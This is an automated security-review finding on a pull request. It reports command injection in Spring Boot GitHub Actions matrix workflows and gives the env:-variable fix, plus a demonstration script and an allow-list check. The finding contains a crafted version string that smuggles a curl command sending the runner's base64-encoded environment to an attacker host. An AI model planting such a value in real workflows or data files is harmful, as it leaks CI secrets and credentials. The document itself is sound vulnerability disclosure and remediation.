Auto update Test Matrix for Spring Boot #4743
1 issue
security-review: Found 1 issue (1 medium)
Medium
PR-controlled JSON version file flows into shell `run:` step via matrix expression, enabling command injection - `.github/workflows/spring-boot-4-matrix.yml:24-39`
`.github/data/spring-boot-3-versions.json` (modifiable in a PR) is read by the `load-versions` job and passed into the matrix; the `Update Spring Boot 3.x version` step then expands `${{ matrix.springboot-version }}` directly inside a `run:` block. A crafted value such as `3.4.1"; curl https://attacker/$(env | base64) #` becomes injected shell on the runner. Move the value to an `env:` variable (e.g. `SPRINGBOOT_VERSION: ${{ matrix.springboot-version }}`) and reference `$SPRINGBOOT_VERSION` instead. The identical pattern exists in `spring-boot-2-matrix.yml` and `spring-boot-4-matrix.yml`.
Also found at:
.github/workflows/spring-boot-2-matrix.yml:39
⏱ 6m 56s · 543.7k in / 56.8k out · $2.31
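The mechanics behind the finding, as an added example that is not code from the PR or the repository: the Actions runner substitutes a `${{ ... }}` expression into the `run:` script text before the shell parses it, so a matrix value carrying a quote and a `;` terminates the intended command and starts a new one, whereas a value delivered through `env:` is expanded by the shell itself into a single word. The script below emulates that substitution with plain string concatenation; the function names, the `echo`-based step standing in for the real version-update command, and the allow-list regex for the JSON values are assumptions made for the illustration, while `SPRINGBOOT_VERSION` is the variable name the finding proposes.

```shell
#!/usr/bin/env sh
# Added example, not code from the PR or the repository. It emulates how the
# Actions runner treats `${{ matrix.springboot-version }}` inside `run:`:
# the expression is spliced into the script text *before* the shell parses it,
# so a value containing `"` and `;` ends the intended command and starts another.
# Function names and the echo-based step are hypothetical stand-ins.

# Constructed attacker value, same shape as the one in the finding.
CRAFTED='3.4.1"; echo INJECTED #'

# Vulnerable shape:  run: echo "version=${{ matrix.springboot-version }}"
# Emulated by concatenating the value into the script text, as the runner does.
vulnerable_step() {
  value="$1"
  script='echo "version='"$value"'"'
  sh -c "$script"
}

# Hardened shape:
#   env:
#     SPRINGBOOT_VERSION: ${{ matrix.springboot-version }}
#   run: echo "version=$SPRINGBOOT_VERSION"
# The script text is now constant; the value only exists as an environment
# variable that the shell expands into one word at run time.
hardened_step() {
  SPRINGBOOT_VERSION="$1" sh -c 'echo "version=$SPRINGBOOT_VERSION"'
}

# Defence in depth for the load-versions job: allow-list the values read from
# the JSON before they reach the matrix. Accepts the Spring Boot release
# formats (3.4.1, 3.5.0-M1, 3.4.0-RC1, 3.3.0-SNAPSHOT) and rejects anything else.
# The regex is an assumption about the accepted version formats.
is_valid_version() {
  printf '%s' "$1" | grep -Eq '^[0-9]+\.[0-9]+\.[0-9]+(-(M[0-9]+|RC[0-9]+|SNAPSHOT))?$'
}

echo "--- vulnerable (value spliced into script text):"
vulnerable_step "$CRAFTED"      # prints version=3.4.1 and then INJECTED
echo "--- hardened (value passed via env):"
hardened_step "$CRAFTED"        # prints the whole value as one literal string
if is_valid_version "$CRAFTED"; then echo "accepted"; else echo "rejected by allow-list"; fi
```

Run it with any POSIX shell; the vulnerable step prints a second line that came from the injected command, the hardened step prints the crafted value verbatim and runs nothing extra, and the allow-list rejects it outright. The `env:` move is the fix the finding asks for; the allow-list is an additional check on the JSON file that stops the value from ever entering the matrix.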
Annotations
Check warning on line 39 in .github/workflows/spring-boot-4-matrix.yml
sentry-warden / warden: security-review
PR-controlled JSON version file flows into shell `run:` step via matrix expression, enabling command injection
Check warning on line 39 in .github/workflows/spring-boot-2-matrix.yml
sentry-warden / warden: security-review
[JNS-EE5] PR-controlled JSON version file flows into shell `run:` step via matrix expression, enabling command injection (additional location)